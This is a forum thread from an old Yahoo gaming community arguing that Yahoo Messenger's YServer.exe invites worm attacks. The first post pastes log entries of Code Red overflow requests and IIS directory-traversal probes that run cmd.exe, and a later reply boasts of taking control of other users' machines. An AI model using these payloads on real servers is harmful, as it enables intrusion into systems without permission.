Announcement

Collapse

Welcome to the New Limpkinw.com

Hey all! I had to move servers and the old version of Vbulletin was not compatible so I did an update.

I know there is no activity here but we do get a lot of visitors, and quote a few old school Yahoo Gamers come by once in a while so I'd hate to take the site down.

Anyways I am going to try to reactivate user registration so some of the folks who forgot their login info can make new accounts.


Maybe I will get a bug up my a$$ and add back in the old arcade and stuff.

I am sorry for the UGLY theme but I will get that fixed at some point!

I hope everyone is well!!!!
See more
See less

Not a trick but proves Yahoo sucks

Collapse
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • Not a trick but proves Yahoo sucks

    In the recent build of yahoo messenger there is a pretty big flaw. When you first open it, it runs a file called Yserver.exe, which in turn announces to the internet your computer is a server. This doesn't sound too bad, but since hundreds if not thousands of computers are infected with worms, they will try to attack your computer as well. You can see evidence of this by opening your YServer.log file (C:/Program Files/Yahoo!/Messenger/Yserver.log) in notepad. The following describes what the attacks look like:
    Code red worm: IP from = 218.49.232.235
    02/17/102 23:00:16.820 02/17/102 23:00:17.310 00:00:00.490 218.49.232.235 Get text/plain /default.ida -1 0 .ida GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0
    Content-type: text/xml
    HOST:www.worm.com
    Accept: */*
    Content-length: 3569

    IIS Attacks: IP from = 66.44.12.141 and 66.68.68.238
    02/25/102 13:31:58.740 02/25/102 13:31:58.740 00:00:00.000 66.44.12.141 Get application/x-msdownload /scripts/root.exe -1 0 .exe GET /scripts/root.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 13:32:07.640 02/25/102 13:32:08.190 00:00:00.550 66.44.12.141 Get application/x-msdownload /MSADC/root.exe -1 0 .exe GET /MSADC/root.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 13:32:17.800 02/25/102 13:32:18.300 00:00:00.500 66.44.12.141 Get application/x-msdownload /c/winnt/system32/cmd.exe -1 0 .exe GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:10.660 02/25/102 17:03:11.150 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/root.exe -1 0 .exe GET /scripts/root.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:11.760 02/25/102 17:03:12.250 00:00:00.490 66.68.68.238 Get application/x-msdownload /MSADC/root.exe -1 0 .exe GET /MSADC/root.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:12.860 02/25/102 17:03:13.350 00:00:00.490 66.68.68.238 Get application/x-msdownload /c/winnt/system32/cmd.exe -1 0 .exe GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:13.950 02/25/102 17:03:14.450 00:00:00.500 66.68.68.238 Get application/x-msdownload /d/winnt/system32/cmd.exe -1 0 .exe GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:15.050 02/25/102 17:03:15.550 00:00:00.500 66.68.68.238 Get application/x-msdownload /scripts/..%255c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:16.210 02/25/102 17:03:16.700 00:00:00.490 66.68.68.238 Get application/x-msdownload /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe -1 0 .exe GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:17.300 02/25/102 17:03:17.800 00:00:00.500 66.68.68.238 Get application/x-msdownload /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe -1 0 .exe GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:18.350 02/25/102 17:03:18.840 00:00:00.490 66.68.68.238 Get application/x-msdownload /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe -1 0 .exe GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:19.450 02/25/102 17:03:19.940 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%c1%1c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:20.490 02/25/102 17:03:21.040 00:00:00.550 66.68.68.238 Get application/x-msdownload /scripts/..%c0%2f../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:21.590 02/25/102 17:03:22.080 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%c0%af../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:22.630 02/25/102 17:03:23.130 00:00:00.500 66.68.68.238 Get application/x-msdownload /scripts/..%c1%9c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:23.730 02/25/102 17:03:24.220 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%%35%63../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:24.830 02/25/102 17:03:25.320 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%%35c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:25.870 02/25/102 17:03:26.370 00:00:00.500 66.68.68.238 Get application/x-msdownload /scripts/..%25%35%63../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:26.920 02/25/102 17:03:27.470 00:00:00.550 66.68.68.238 Get application/x-msdownload /scripts/..%252f../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close

    Luckily, this isnt harmful to most of you since you dont use a server at home, but there is probably a way to exploit this for other uses. By the way, if you want to find out where the attacking IP is located, go to http://visualroute.visualware.com/ type the ip in the box, and push enter. I even had one attack coming from some apartment place in Piano, Texas.
    Normality is the playground of the unimaginative.

  • #2
    hit ctrl+alt+del and close Yserver .messenger still stays on but the worm is gone
    Sinister69 - Need I Say More..
    www.Fucking-Yahoo.com - Didnt Think So..

    Comment


    • #3
      worm dis!

      w0rm my ass ... if u guys dunno wat it is dont hype it up

      limp & mike u wanna talk bout it come over see me dogg and rob

      Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : midsouth.rr.com IP Address. . . . . . . . . . . . : 24.165.145.32 Subnet Mask . . . . . . . . . . . : 255.255.252.0 Default Gateway . . . . . . . . . : 24.165.144.1

      Comment


      • #4
        ..

        wtf r u guys talking bout? i can't undertand ANYTHING u guyz r say'n
        lzicl

        Comment


        • #5
          they r talkin bout how to make a pie
          °·.·.·.·°DaNieL™°·.·.·.·°

          Comment


          • #6
            we all knew yaho osucked a long time ago

            its not new news to hear that yahoo sux we all knew this for the longest time but you are right this proves they extra suclz
            Attached Files
            :-X love ya forever and always

            Comment


            • #7
              damn

              you all hardcore up on this subject limpy why such a strong opinion? if i may ask *Hides in corner *
              Attached Files
              :-X love ya forever and always

              Comment


              • #8
                lol funny talking about yserver.exe lol lmfao do some real stuff sniff the data with commview and then you can see the real packets :-D www.commview.com get the shareware lol
                My New Alias: Khaotic_Silence - Location: Yahoo! Messenger

                Comment


                • #9
                  lol...guys...ANY SERVER file can be used to trojan..once you have the server on your pc it opens a port up which can be exploited with certains trojans or certain worms.... if any1 want to know.. believe me if u want...but eh...some will know this is true
                  [gl]HACKERS WEBSITE[/gl]

                  Comment


                  • #10
                    Shut the fock up $mev, i have a comp as server and i use Yahoo messanger, i never got a problem , FOCK UP damn newbies!

                    Comment


                    • #11
                      Pascal... u child.. this post was ages ago.. and u obviously know $hit... yes, a server carries. As limp said u fricking idiot "Which could mean nothing at all, or could mean something." READ BEFORE YOU MOUTH OFF.. and what am I a newbie to? Ur a newbie to this site, I've been on yahoo longer than you, ive probbly been living longer than you... whos a newbie? THINK BEFORE YOU SPEAK FRENCHIE.. and btw.. I know who u are
                      [gl]HACKERS WEBSITE[/gl]

                      Comment


                      • #12
                        *points and laughs at pascal*
                        "Dad, what's the blow-hole for?"
                        "I'll tell you what it's not for, son. And when I do, you'll understand why I can never go back to Sea World."

                        Comment


                        • #13
                          Oh $vev man ! tell me the name of the TROJAN than u speak a lot,
                          no response ???
                          U GET PISSED LOL

                          Comment


                          • #14
                            Smev isn;t lying/... Tehre is a server file... It has somethign to do with the yahoo updater ... I'm such a pimp.. Smev it is highly vunerable being something new.... And yes you cna over flow and control other machines with this server file....The extent i have been able to use it is yahoo options only.. I haven;t been able tyo get outta others messengers... and into other files on their comp... in time..I should have spent more time with altering torjans hehehe.. cuz all i doing is altering a server file here hehehe.....Who hsould i completely own once i learn?

                            Comment


                            • #15
                              pascal it is NOT a trojan mearly a way for yahoo to connect to your comp and update or tellyou there is an update...

                              Comment

                              Working...
                              X